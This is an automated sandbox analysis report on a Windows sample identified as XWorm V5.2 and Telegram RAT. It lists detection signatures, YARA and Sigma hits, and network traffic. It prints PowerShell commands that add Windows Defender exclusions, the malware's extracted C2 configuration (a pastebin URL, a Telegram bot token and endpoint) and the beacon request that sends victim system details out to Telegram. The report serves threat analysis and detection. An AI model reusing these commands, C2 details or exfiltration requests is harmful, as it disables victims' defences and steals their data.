
Windows Analysis Report
2QaN4hOyJs.exe

Overview

General Information

Sample name: 2QaN4hOyJs.exe (renamed because the original name is a hash value)
Original sample name: 712ab1b048b49449d00e124e577e7eabe732252e0ba9ce3cead7eaf46f44903e.exe
Analysis ID: 1579078
MD5: 0999f25f0123e520bb0259a5741f621b
SHA1: 27a3fd47f336dbf4663cbbe1bbde7a3e76179247
SHA256: 712ab1b048b49449d00e124e577e7eabe732252e0ba9ce3cead7eaf46f44903e
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 2QaN4hOyJs.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\2QaN4hOyJs.exe" MD5: 0999F25F0123E520BB0259A5741F621B)
    • powershell.exe (PID: 7724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": ["https://pastebin.com/raw/4X62dQQ8"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
{"C2 url": "https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage"}
Source | Rule | Description | Author | Strings
Source: 2QaN4hOyJs.exe | Rule: JoeSecurity_TelegramRecon | Description: Yara detected Telegram Recon | Author: Joe Security
Source: 2QaN4hOyJs.exe | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 2QaN4hOyJs.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 2QaN4hOyJs.exe | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 2QaN4hOyJs.exe | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x8efa:$s6: VirtualBox
  • 0x8e58:$s8: Win32_ComputerSystem
  • 0x99c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9a61:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9b76:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x9556:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
Source: sslproxydump.pcap | Rule: JoeSecurity_XWorm_1 | Description: Yara detected XWorm | Author: Joe Security

Source | Rule | Description | Author | Strings
Source: C:\Users\user\AppData\Local\Temp\System | Rule: JoeSecurity_TelegramRecon | Description: Yara detected Telegram Recon | Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\System | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\System | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\System | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\System | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x8efa:$s6: VirtualBox
  • 0x8e58:$s8: Win32_ComputerSystem
  • 0x99c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9a61:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9b76:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x9556:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x8cfa:$s6: VirtualBox
  • 0x8c58:$s8: Win32_ComputerSystem
  • 0x97c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9861:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9976:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x9356:$cnc4: POST / HTTP/1.1
Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security

Source | Rule | Description | Author | Strings
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x70fa:$s6: VirtualBox
  • 0x7058:$s8: Win32_ComputerSystem
  • 0x7bc4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7c61:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7d76:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7756:$cnc4: POST / HTTP/1.1
Source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', ProcessId: 7724, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', ProcessId: 2976, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', ProcessId: 2976, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', ProcessId: 7724, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', ProcessId: 7724, ProcessName: powershell.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\2QaN4hOyJs.exe, ProcessId: 7544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', ProcessId: 7724, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T19:15:05.861207+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.9 | 49854 | 149.154.167.220 | 443 | TCP



AV Detection

Source: 2QaN4hOyJs.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Temp\System; Avira: detection malicious, Label: TR/Spy.Gen
Source: 2QaN4hOyJs.exe; Malware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/4X62dQQ8"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: 2QaN4hOyJs.exe.7544.0.memstrmin; Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage"}
Source: C:\Users\user\AppData\Local\Temp\System; ReversingLabs: Detection: 81%
Source: 2QaN4hOyJs.exe; ReversingLabs: Detection: 81%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\System; Joe Sandbox ML: detected
Source: 2QaN4hOyJs.exe; Joe Sandbox ML: detected
Source: 2QaN4hOyJs.exe; String decryptor: https://pastebin.com/raw/4X62dQQ8
Source: 2QaN4hOyJs.exe; String decryptor: <123456789>
Source: 2QaN4hOyJs.exe; String decryptor: <Xwormmm>
Source: 2QaN4hOyJs.exe; String decryptor: System
Source: 2QaN4hOyJs.exe; String decryptor: USB.exe
Source: 2QaN4hOyJs.exe; String decryptor: %Temp%
Source: 2QaN4hOyJs.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49849 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49854 version: TLS 1.2
Source: 2QaN4hOyJs.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic; Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.9:49854 -> 149.154.167.220:443
Source: Malware configuration extractor; URLs: https://pastebin.com/raw/4X62dQQ8
Source: unknown; DNS query: name: pastebin.com
Source: unknown; DNS query: name: api.telegram.org
Source: Yara match; File source: 2QaN4hOyJs.exe, type: SAMPLE
Source: Yara match; File source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED
Source: global traffic; HTTP traffic detected: GET /raw/4X62dQQ8 HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=7705511583&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4AB9DA9F1C2993F263A7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%205BNYU1CK1%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20System HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View; IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: ip-api.com
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: pastebin.com
Source: global traffic; DNS traffic detected: DNS query: api.telegram.org
Source: global traffic; DNS traffic detected: DNS query: Brian123121-27796.portmap.io
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.18.0 | Date: Fri, 20 Dec 2024 18:15:05 GMT | Content-Type: application/json | Content-Length: 84 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000005.00000002.1559162610.000001FEF5C34000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1923662075.000002B8618B6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
Source: powershell.exe, 00000005.00000002.1556486342.000001FEF5663000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.1556486342.000001FEF5663000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsm
Source: 2QaN4hOyJs.exe, System.0.dr; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.1444776853.000001D0E9413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541139414.000001FE90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1688930369.0000024B11E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1422516094.000001D0D95C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1422516094.000001D0D93A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8493D1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1422516094.000001D0D95C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.1923414066.000002B861888000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.coFA
Source: powershell.exe, 0000000C.00000002.1926579498.000002B861950000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.coL
Source: powershell.exe, 00000005.00000002.1559162610.000001FEF5CC9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.coi
Source: powershell.exe, 00000002.00000002.1422516094.000001D0D93A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8493D1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegrP
Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org
Source: 2QaN4hOyJs.exe, System.0.dr; String found in binary or memory: https://api.telegram.org/bot
Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=77055
Source: powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1444776853.000001D0E9413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541139414.000001FE90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1688930369.0000024B11E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/raw/4X62dQQ8
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown; Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49849
